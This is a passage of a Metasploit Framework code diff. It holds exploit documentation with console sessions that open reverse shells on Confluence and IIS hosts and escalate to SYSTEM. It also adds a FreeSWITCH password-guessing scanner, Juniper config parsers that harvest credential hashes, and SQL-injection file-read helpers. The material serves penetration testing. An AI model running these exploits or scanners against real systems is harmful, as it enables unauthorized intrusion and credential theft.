+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
+[+] 192.168.56.1:8021        - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
+[*] 192.168.56.1:8021        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md

@@ -87,4 +87,41 @@ Meterpreter     : python/linux
 meterpreter > 
 ```
 
+### Confluence 7.17.2 on Windows Server 2019
+
+```
+msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set TARGET Windows\ Command 
+TARGET => Windows Command
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested OGNL injection.
+[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[*] Sending stage (200774 bytes) to 192.168.159.10
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49943) at 2022-06-15 17:22:07 -0400
+
+meterpreter > sysinfo
+Computer        : WIN-3MSP8K2LCGC
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
+meterpreter > 
+```
+
 [1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro

documentation/modules/exploit/multi/http/phpmailer_arg_injection.md

@@ -18,6 +18,17 @@ exploitation can take a few minutes.
   6.  Verify the module yields a PHP meterpreter session in < 5 minutes
   7.  Verify the malicious PHP file was automatically removed
 
+## Options
+
+### WAIT_TIMEOUT
+Seconds to wait to trigger the payload
+### NameField
+Name of the element for the Name field
+### EmailField
+Name of the element for the Email field
+### MessageField
+Name of the element for the Message field
+
 ## Scenarios
 
   Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)

documentation/modules/exploit/windows/iis/ms01_026_dbldecode.md

@@ -0,0 +1,71 @@
+## Vulnerable Application
+
+This module will execute an arbitrary payload on a Microsoft IIS installation
+that is vulnerable to the CGI double-decode vulnerability of 2001.
+
+This module has been tested successfully on:
+
+* Windows 2000 Professional (SP0) (EN)
+* Windows 2000 Professional (SP1) (AR)
+* Windows 2000 Professional (SP1) (CZ)
+* Windows 2000 Server (SP0) (FR)
+* Windows 2000 Server (SP1) (EN)
+* Windows 2000 Server (SP1) (SE)
+
+Note: This module will leave a Metasploit payload in the IIS scripts directory.
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms01_026_dbldecode`
+1. `set RHOSTS [IP]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+### WINDIR
+
+The Windows directory name of the target host.
+The directory name will be detected automatically if not set.
+
+### DEPTH
+
+Traversal depth to reach the drive root (default: `2`)
+
+## Scenarios
+
+### Windows 2000 Server (SP0) (FR)
+
+```
+msf6 > use exploit/windows/iis/ms01_026_dbldecode
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
+rhosts => 192.168.200.175
+msf6 exploit(windows/iis/ms01_026_dbldecode) > check
+[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
+msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms01_026_dbldecode) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Using Windows directory "winnt"
+[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
+[*] Command Stager progress -  66.67% done (40/60 bytes)
+[*] Command Stager progress - 100.00% done (60/60 bytes)
+[*] Triggering payload "qQErEZeB.exe" via a direct request...
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.175
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
+[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+          
+
+c:\inetpub\scripts>hostname
+hostname
+win2k-srv-fr
+```

lib/metasploit/framework/login_scanner/freeswitch_event_socket.rb

@@ -0,0 +1,80 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with FreeSWITCH EventSocket.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+
+      class FreeswitchEventSocket
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        DEFAULT_PORT         = 8021
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES = [ 'freeswitch' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attempt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            host: host,
+            port: port,
+            protocol: 'tcp',
+            service_name: 'freeswitch'
+          }
+
+          disconnect if self.sock
+
+          begin
+            connect
+            select([sock], nil, nil, 0.4)
+
+            sock.get_once
+            sock.put("auth #{credential.private}\n\n")
+
+            /Reply-Text: (?<reply>.*)/ =~ sock.get_once
+            result_options[:proof] = reply
+
+            # Invalid password - ( -ERR invalid\n\n )
+            # Valid password   - ( +OK accepted\n\n )
+
+            if result_options[:proof]&.include?('-ERR invalid')
+              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+            elsif result_options[:proof]&.include?('+OK accepted')
+              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+            end
+
+          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE, Rex::StreamClosedError => e
+            result_options.merge!(
+              proof: e.message,
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            )
+          end
+          disconnect if self.sock
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.connection_timeout  ||= 10
+          self.port                ||= DEFAULT_PORT
+          self.max_send_size       ||= 0
+          self.send_delay          ||= 0
+        end
+      end
+    end
+  end
+end

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "6.2.3"
+      VERSION = "6.2.6"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/auxiliary/juniper.rb

@@ -3,257 +3,278 @@
 require 'metasploit/framework/hashes/identify'
 
 module Msf
+  ###
+  #
+  # This module provides methods for working with Juniper equipment
+  #
+  ###
+  module Auxiliary::Juniper
+    include Msf::Auxiliary::Report
 
-###
-#
-# This module provides methods for working with Juniper equipment
-#
-###
-module Auxiliary::Juniper
-  include Msf::Auxiliary::Report
+    def juniper_screenos_config_eater(thost, tport, config)
+      # this is for the netscreen OS, which came on SSG (ie SSG5) type devices.
+      # It is similar to cisco, however it doesn't always put all fields we care
+      # about on one line.
+      # Docs: snmp -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB4223
+      #       ppp  -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB22592
+      #       ike  -> https://kb.juniper.net/KB4147
+      #       https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_strings.py#L171
 
-  def juniper_screenos_config_eater(thost, tport, config)
-    # this is for the netscreen OS, which came on SSG (ie SSG5) type devices.
-    # It is similar to cisco, however it doesn't always put all fields we care
-    # about on one line.
-    # Docs: snmp -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB4223
-    #       ppp  -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB22592
-    #       ike  -> https://kb.juniper.net/KB4147
-    #       https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_strings.py#L171
+      report_host({
+        host: thost,
+        os_name: 'Juniper ScreenOS'
+      })
 
-    report_host({
-      :host => thost,
-      :os_name => 'Juniper ScreenOS'
-    })
-
-    if framework.db.active
-      credential_data = {
-        address: thost,
-        port: tport,
-        protocol: 'tcp',
-        workspace_id: myworkspace_id,
-        origin_type: :service,
-        service_name: '',
-        private_type: :nonreplayable_hash,
-        module_fullname: self.fullname,
-        status: Metasploit::Model::Login::Status::UNTRIED
-      }
-    end
-
-    store_loot('juniper.netscreen.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper Netscreen Configuration')
-
-    # admin name and password
-    # Example lines:
-    # set admin name "netscreen"
-    # set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
-    config.scan(/set admin name "(?<admin_name>[a-z0-9]+)".+set admin password "(?<admin_password_hash>[a-z0-9]+)"/mi).each do |result|
-      admin_name = result[0].strip
-      admin_hash = result[1].strip
-      print_good("Admin user #{admin_name} found with password hash #{admin_hash}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = admin_name
-      cred[:private_data] = admin_hash
-      create_credential_and_login(cred)
-    end
-
-    # user account
-    # Example lines:
-    # set user "testuser" uid 1
-    # set user "testuser" type auth
-    # set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
-    # set user "testuser" enable
-    config.scan(/set user "(?<user_name>[a-z0-9]+)" uid (?<user_uid>\d+).+set user "\k<user_name>" type (?<user_type>\w+).+set user "\k<user_name>" hash-password "(?<user_hash>[0-9a-z=]{38})".+set user "\k<user_name>" (?<user_enable>enable).+/mi).each do |result|
-      user_name = result[0].strip
-      user_uid  = result[1].strip
-      user_enable = result[4].strip
-      user_hash = result[3].strip
-      print_good("User #{user_uid} named #{user_name} found with password hash #{user_hash}. Enable permission: #{user_enable}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = user_name
-      cred[:jtr_format] = 'sha1'
-      cred[:private_data] = user_hash
-      create_credential_and_login(cred)
-    end
-
-    # snmp
-    # Example lines:
-    # set snmp community "sales" Read-Write Trap-on traffic version v1
-    config.scan(/set snmp community "(?<snmp_community>[a-z0-9]+)" (?<snmp_permissions>Read-Write|Read-Only)/i).each do |result|
-      snmp_community = result[0].strip
-      snmp_permissions = result[1].strip
-      print_good("SNMP community #{snmp_community} with permissions #{snmp_permissions}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      if snmp_permissions.downcase == 'read-write'
-        cred[:access_level] = 'RW'
-      else
-        cred[:access_level] = 'RO'
-      end
-      cred[:protocol] = 'udp'
-      cred[:port] = 161
-      cred[:service_name] = 'snmp'
-      cred[:private_data] = snmp_community
-      cred[:private_type] = :password
-      create_credential_and_login(cred)
-    end
-
-    # ppp
-    # Example lines:
-    # setppp profile "ISP" auth type pap
-    # setppp profile "ISP" auth local-name "username"
-    # setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="
-    config.scan(/setppp profile "(?<ppp_name>[a-z0-9]+)" auth type (?<ppp_authtype>[a-z]+).+setppp profile "\k<ppp_name>" auth local-name "(?<ppp_username>[a-z0-9]+)".+setppp profile "\k<ppp_name>" auth secret "(?<ppp_hash>.+)"/mi).each do |result|
-      ppp_name = result[0].strip
-      ppp_username = result[2].strip
-      ppp_hash = result[3].strip
-      ppp_authtype = result[1].strip
-      print_good("PPTP Profile #{ppp_name} with username #{ppp_username} hash #{ppp_hash} via #{ppp_authtype}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = ppp_username
-      cred[:private_data] = ppp_hash
-      cred[:service_name] = 'pptp'
-      cred[:port] = 1723
-      create_credential_and_login(cred)
-    end
-
-    # ike
-    # Example lines:
-    # set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"
-    config.scan(/set ike gateway "(?<ike_name>.+)" address (?<ike_address>[0-9.]+) Main outgoing-interface ".+" preshare "(?<ike_password>.+)" proposal "(?<ike_method>.+)"/i).each do |result|
-      ike_name = result[0].strip
-      ike_address = result[1].strip
-      ike_password = result[2].strip
-      ike_method = result[3].strip
-      print_good("IKE Profile #{ike_name} to #{ike_address} with password #{ike_password} via #{ike_method}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:private_data] = ike_password
-      cred[:private_type] = :password
-      cred[:service_name] = 'ike'
-      cred[:port] = 500
-      cred[:address] = ike_address
-      cred[:protocol] = 'udp'
-      create_credential_and_login(cred)
-    end
-
-  end
-
-
-  def juniper_junos_config_eater(thost, tport, config)
-
-   report_host({
-      :host => thost,
-      :os_name => 'Juniper JunOS'
-    })
-
-
-    if framework.db.active
-      credential_data = {
-        address: thost,
-        port: tport,
-        protocol: 'tcp',
-        workspace_id: myworkspace_id,
-        origin_type: :service,
-        private_type: :nonreplayable_hash,
-        service_name: '',
-        module_fullname: self.fullname,
-        status: Metasploit::Model::Login::Status::UNTRIED
-      }
-    end
-
-    store_loot('juniper.junos.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper JunOS Configuration')
-
-    # we'll take out the pretty format so its easier to regex
-    config = config.split("\n").join('')
-
-    # Example:
-    #system {
-    #  root-authentication {
-    #    encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
-    #  }
-    #}
-    if /root-authentication[\s]+\{[\s]+encrypted-password "(?<root_hash>[^"]+)";/i =~ config
-      root_hash = root_hash.strip
-      jtr_format = identify_hash root_hash
-
-      print_good("root password hash: #{root_hash}")
       if framework.db.active
+        credential_data = {
+          address: thost,
+          port: tport,
+          protocol: 'tcp',
+          workspace_id: myworkspace_id,
+          origin_type: :service,
+          service_name: '',
+          private_type: :nonreplayable_hash,
+          module_fullname: fullname,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
+      end
+
+      store_loot('juniper.netscreen.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper Netscreen Configuration')
+
+      # admin name and password
+      # Example lines:
+      # set admin name "netscreen"
+      # set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
+      config.scan(/set admin name "(?<admin_name>[a-z0-9]+)".+set admin password "(?<admin_password_hash>[a-z0-9]+)"/mi).each do |result|
+        admin_name = result[0].strip
+        admin_hash = result[1].strip
+        print_good("Admin user #{admin_name} found with password hash #{admin_hash}")
+        next unless framework.db.active
+
         cred = credential_data.dup
-        cred[:username] = 'root'
-        cred[:jtr_format] = jtr_format
-        cred[:private_data] = root_hash
+        cred[:username] = admin_name
+        cred[:private_data] = admin_hash
+        create_credential_and_login(cred)
+      end
+
+      # user account
+      # Example lines:
+      # set user "testuser" uid 1
+      # set user "testuser" type auth
+      # set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
+      # set user "testuser" enable
+      config.scan(/set user "(?<user_name>[a-z0-9]+)" uid (?<user_uid>\d+).+set user "\k<user_name>" type (?<user_type>\w+).+set user "\k<user_name>" hash-password "(?<user_hash>[0-9a-z=]{38})".+set user "\k<user_name>" (?<user_enable>enable).+/mi).each do |result|
+        user_name = result[0].strip
+        user_uid = result[1].strip
+        user_enable = result[4].strip
+        user_hash = result[3].strip
+        print_good("User #{user_uid} named #{user_name} found with password hash #{user_hash}. Enable permission: #{user_enable}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:username] = user_name
+        cred[:jtr_format] = 'sha1'
+        cred[:private_data] = user_hash
+        create_credential_and_login(cred)
+      end
+
+      # snmp
+      # Example lines:
+      # set snmp community "sales" Read-Write Trap-on traffic version v1
+      config.scan(/set snmp community "(?<snmp_community>[a-z0-9]+)" (?<snmp_permissions>Read-Write|Read-Only)/i).each do |result|
+        snmp_community = result[0].strip
+        snmp_permissions = result[1].strip
+        print_good("SNMP community #{snmp_community} with permissions #{snmp_permissions}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        if snmp_permissions.downcase == 'read-write'
+          cred[:access_level] = 'RW'
+        else
+          cred[:access_level] = 'RO'
+        end
+        cred[:protocol] = 'udp'
+        cred[:port] = 161
+        cred[:service_name] = 'snmp'
+        cred[:private_data] = snmp_community
+        cred[:private_type] = :password
+        create_credential_and_login(cred)
+      end
+
+      # ppp
+      # Example lines:
+      # setppp profile "ISP" auth type pap
+      # setppp profile "ISP" auth local-name "username"
+      # setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="
+      config.scan(/setppp profile "(?<ppp_name>[a-z0-9]+)" auth type (?<ppp_authtype>[a-z]+).+setppp profile "\k<ppp_name>" auth local-name "(?<ppp_username>[a-z0-9]+)".+setppp profile "\k<ppp_name>" auth secret "(?<ppp_hash>.+)"/mi).each do |result|
+        ppp_name = result[0].strip
+        ppp_username = result[2].strip
+        ppp_hash = result[3].strip
+        ppp_authtype = result[1].strip
+        print_good("PPTP Profile #{ppp_name} with username #{ppp_username} hash #{ppp_hash} via #{ppp_authtype}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:username] = ppp_username
+        cred[:private_data] = ppp_hash
+        cred[:service_name] = 'pptp'
+        cred[:port] = 1723
+        create_credential_and_login(cred)
+      end
+
+      # ike
+      # Example lines:
+      # set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"
+      config.scan(/set ike gateway "(?<ike_name>.+)" address (?<ike_address>[0-9.]+) Main outgoing-interface ".+" preshare "(?<ike_password>.+)" proposal "(?<ike_method>.+)"/i).each do |result|
+        ike_name = result[0].strip
+        ike_address = result[1].strip
+        ike_password = result[2].strip
+        ike_method = result[3].strip
+        print_good("IKE Profile #{ike_name} to #{ike_address} with password #{ike_password} via #{ike_method}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:private_data] = ike_password
+        cred[:private_type] = :password
+        cred[:service_name] = 'ike'
+        cred[:port] = 500
+        cred[:address] = ike_address
+        cred[:protocol] = 'udp'
         create_credential_and_login(cred)
       end
     end
 
-    # access privileges https://kb.juniper.net/InfoCenter/index?page=content&id=KB10902
-    config.scan(/user (?<user_name>[^\s]+) {[\s]+ uid (?<user_uid>[\d]+);[\s]+ class (?<user_permission>super-user|operator|read-only|unauthorized);[\s]+ authentication {[\s]+encrypted-password "(?<user_hash>[^\s]+)";/i).each do |result|
-      user_name = result[0].strip
-      user_uid  = result[1].strip
-      user_permission = result[2].strip
-      user_hash = result[3].strip
-      jtr_format = identify_hash user_hash
+    def juniper_junos_config_eater(thost, tport, config)
+      report_host({
+        host: thost,
+        os_name: 'Juniper JunOS'
+      })
 
-      print_good("User #{user_uid} named #{user_name} in group #{user_permission} found with password hash #{user_hash}.")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = user_name
-      cred[:jtr_format] = jtr_format
-      cred[:private_data] = user_hash
-      create_credential_and_login(cred)
-    end
-
-    # https://supportf5.com/csp/article/K6449 special characters allowed in snmp community strings
-    config.scan(/community "?(?<snmp_community>[\w\d\s\(\)\.\*\/-:_\?=@\,&%\$]+)"? {(\s+view [\w\-]+;)?\s+authorization read-(?<snmp_permission>only|write)/i).each do |result|
-      snmp_community = result[0].strip
-      snmp_permissions = result[1].strip
-      print_good("SNMP community #{snmp_community} with permissions read-#{snmp_permissions}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      if snmp_permissions.downcase == 'write'
-        cred[:access_level] = 'RW'
-      else
-        cred[:access_level] = 'RO'
+      if framework.db.active
+        credential_data = {
+          address: thost,
+          port: tport,
+          protocol: 'tcp',
+          workspace_id: myworkspace_id,
+          origin_type: :service,
+          private_type: :nonreplayable_hash,
+          service_name: '',
+          module_fullname: fullname,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
       end
-      cred[:protocol] = 'udp'
-      cred[:port] = 161
-      cred[:private_data] = snmp_community
-      cred[:private_type] = :password
-      cred[:service_name] = 'snmp'
-      create_credential_and_login(cred)
-    end
 
-    config.scan(/radius-server \{[\s]+(?<radius_server>[0-9\.]{7,15}) secret "(?<radius_hash>[^"]+)";/i).each do |result|
-      radius_hash = result[1].strip
-      radius_server = result[0].strip
-      print_good("radius server #{radius_server} password hash: #{radius_hash}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:address] = radius_server
-      cred[:port] = 1812
-      cred[:protocol] = 'udp'
-      cred[:private_data] = radius_hash
-      cred[:service_name] = 'radius'
-      create_credential_and_login(cred)
-    end
+      store_loot('juniper.junos.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper JunOS Configuration')
 
-    config.scan(/pap {[\s]+local-name "(?<ppp_username>.+)";[\s]+local-password "(?<ppp_hash>[^"]+)";/i).each do |result|
-      ppp_username = result[0].strip
-      ppp_hash = result[1].strip
-      print_good("PPTP username #{ppp_username} hash #{ppp_hash} via PAP")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = ppp_username
-      cred[:private_data] = ppp_hash
-      cred[:service_name] = 'pptp'
-      cred[:port] = 1723
-      create_credential_and_login(cred)
-    end
+      # we'll take out the pretty format so its easier to regex
+      config = config.split("\n").join('')
 
+      # Example:
+      # system {
+      #  root-authentication {
+      #    encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
+      #  }
+      # }
+      if /root-authentication\s+\{\s+encrypted-password "(?<root_hash>[^"]+)";/i =~ config
+        root_hash = root_hash.strip
+        jtr_format = identify_hash root_hash
+
+        print_good("root password hash: #{root_hash}")
+        if framework.db.active
+          cred = credential_data.dup
+          cred[:username] = 'root'
+          cred[:jtr_format] = jtr_format
+          cred[:private_data] = root_hash
+          create_credential_and_login(cred)
+        end
+      end
+
+      # access privileges https://kb.juniper.net/InfoCenter/index?page=content&id=KB10902
+      config.scan(/user (?<user_name>[^\s]+) {(\s+ full-name (?<fullname>[^;]+);)?\s+ uid (?<user_uid>\d+);\s+ class (?<user_permission>super-user|operator|read-only|unauthorized|[^;]+);\s+ authentication {\s+encrypted-password "(?<user_hash>[^\s]+)";/i).each do |result|
+        user_name = result[0].strip
+        user_uid = result[2].strip
+        user_permission = result[3].strip
+        user_hash = result[4].strip
+        jtr_format = identify_hash user_hash
+
+        print_good("User #{user_uid} named #{user_name} in group #{user_permission} found with password hash #{user_hash}.")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:username] = user_name
+        cred[:jtr_format] = jtr_format
+        cred[:private_data] = user_hash
+        create_credential_and_login(cred)
+      end
+
+      # https://supportf5.com/csp/article/K6449 special characters allowed in snmp community strings
+      config.scan(%r{community "?(?<snmp_community>[\w\d\s().*/-:_?=@,&%$+!]+)"? \{(\s+view [\w\-]+;)?\s+authorization read-(?<snmp_permission>only|write)}i).each do |result|
+        snmp_community = result[0].strip
+        snmp_permissions = result[1].strip
+        print_good("SNMP community #{snmp_community} with permissions read-#{snmp_permissions}")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        if snmp_permissions.downcase == 'write'
+          cred[:access_level] = 'RW'
+        else
+          cred[:access_level] = 'RO'
+        end
+        cred[:protocol] = 'udp'
+        cred[:port] = 161
+        cred[:private_data] = snmp_community
+        cred[:private_type] = :password
+        cred[:service_name] = 'snmp'
+        create_credential_and_login(cred)
+      end
+
+      # radius-server
+      config.scan(/\s*radius-server \{([^}]+)\}/i).each do |result_block|
+        result_block[0].strip.scan(/(?<radius_server>[0-9.]{7,15}) secret "(?<radius_hash>[^"]+)";/i).each do |result|
+          radius_hash = result[1].strip
+          radius_server = result[0].strip
+          print_good("radius server #{radius_server} password hash: #{radius_hash}")
+          next unless framework.db.active
+
+          cred = credential_data.dup
+          cred[:address] = radius_server
+          cred[:port] = 1812
+          cred[:protocol] = 'udp'
+          cred[:private_data] = radius_hash
+          cred[:service_name] = 'radius'
+          create_credential_and_login(cred)
+        end
+      end
+
+      # tacplus-server
+      config.scan(/\s*tacplus-server \{([^}]+)\}/i).each do |result_block|
+        result_block[0].strip.scan(/(?<tacplus_server>[0-9.]{7,15}) secret "(?<hash>[^"]+)";/i).each do |result|
+          ip = result[0].strip
+          hash = result[1].strip
+          jtr_format = identify_hash hash
+          print_good("tacplus server #{ip} with password hash #{hash}")
+          next unless framework.db.active
+
+          cred = credential_data.dup
+          cred[:jtr_format] = jtr_format
+          cred[:private_data] = hash
+          create_credential_and_login(cred)
+        end
+      end
+
+      config.scan(/pap {\s+local-name "(?<ppp_username>.+)";\s+local-password "(?<ppp_hash>[^"]+)";/i).each do |result|
+        ppp_username = result[0].strip
+        ppp_hash = result[1].strip
+        print_good("PPTP username #{ppp_username} hash #{ppp_hash} via PAP")
+        next unless framework.db.active
+
+        cred = credential_data.dup
+        cred[:username] = ppp_username
+        cred[:private_data] = ppp_hash
+        cred[:service_name] = 'pptp'
+        cred[:port] = 1723
+        create_credential_and_login(cred)
+      end
+    end
   end
 end
-end
-

lib/msf/core/exploit/cmd_stager.rb

@@ -67,6 +67,7 @@ module Exploit::CmdStager
         OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
         OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.']),
         OptString.new('CMDSTAGER::TEMP', [false, 'Writable directory for staged files']),
+        OptString.new('CMDSTAGER::URIPATH', [false, 'Payload URI path for supported stagers']),
         OptBool.new('CMDSTAGER::SSL', [false, 'Use SSL/TLS for supported stagers', false])
       ], self.class)
   end
@@ -147,6 +148,7 @@ module Exploit::CmdStager
 
     if stager_instance.respond_to?(:http?) && stager_instance.http?
       opts[:ssl] = datastore['CMDSTAGER::SSL'] unless opts.key?(:ssl)
+      opts['Path'] = datastore['CMDSTAGER::URIPATH'] unless datastore['CMDSTAGER::URIPATH'].blank?
       opts[:payload_uri] = start_service(opts)
     end
 

lib/msf/core/exploit/sqli/mssqli/common.rb

@@ -196,6 +196,24 @@ module Msf::Exploit::SQLi::Mssqli
       run_sql("select '#{data}' into dumpfile '#{fpath}'")
     end
 
+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      alias1 = Rex::Text.rand_text_alpha(1) + Rex::Text.rand_text_alphanumeric(5..11)
+      expr = @encoder ? @encoder[:encode].sub(/\^DATA\^/, 'BulkColumn') : 'BulkColumn'
+      output = if @truncation_length
+        truncated_query("select substring(#{expr},^OFFSET^,#{@truncation_length}) " \
+        "from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      else
+        run_sql("select #{expr} from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      end
+      output = @encoder[:decode].call(output) if @encoder
+      output
+    end
+
     private
 
     #

lib/msf/core/exploit/sqli/mysqli/common.rb

@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::MySQLi
     #
     ENCODERS = {
       base64: {
-        encode: 'to_base64(^DATA^)',
+        encode: 'replace(to_base64(^DATA^), \'\\n\', \'\')',
         decode: proc { |data| Base64.decode64(data) }
       },
       hex: {
@@ -217,10 +217,11 @@ module Msf::Exploit::SQLi::MySQLi
     #
     # Attempt reading from a file on the filesystem, requires having the FILE privilege
     # @param fpath [String] The path of the file to read
+    # @param binary [Boolean] Whether the target file is a binary one or not
     # @return [String] The content of the file if reading was successful
     #
-    def read_from_file(fpath)
-      run_sql("select load_file('#{fpath}')")
+    def read_from_file(fpath, binary=false)
+      call_function("load_file('#{fpath}')")
     end
 
     private

lib/msf/core/exploit/sqli/postgresqli/common.rb

@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::PostgreSQLi
     #
     ENCODERS = {
       base64: {
-        encode: 'encode(^DATA^::bytea, \'base64\')',
+        encode: 'translate(encode(^DATA^::bytea, \'base64\'), E\'\n\',\'\')',
         decode: proc { |data| Base64.decode64(data) }
       },
       hex: {
@@ -206,6 +206,22 @@ module Msf::Exploit::SQLi::PostgreSQLi
       raw_run_sql("copy (select '#{data}') to '#{fname}'")
     end
 
+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @param binary [String] Whether the target file should be considered a binary one (defaults to false)
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      if binary
+        # pg_read_binary_file returns bytea
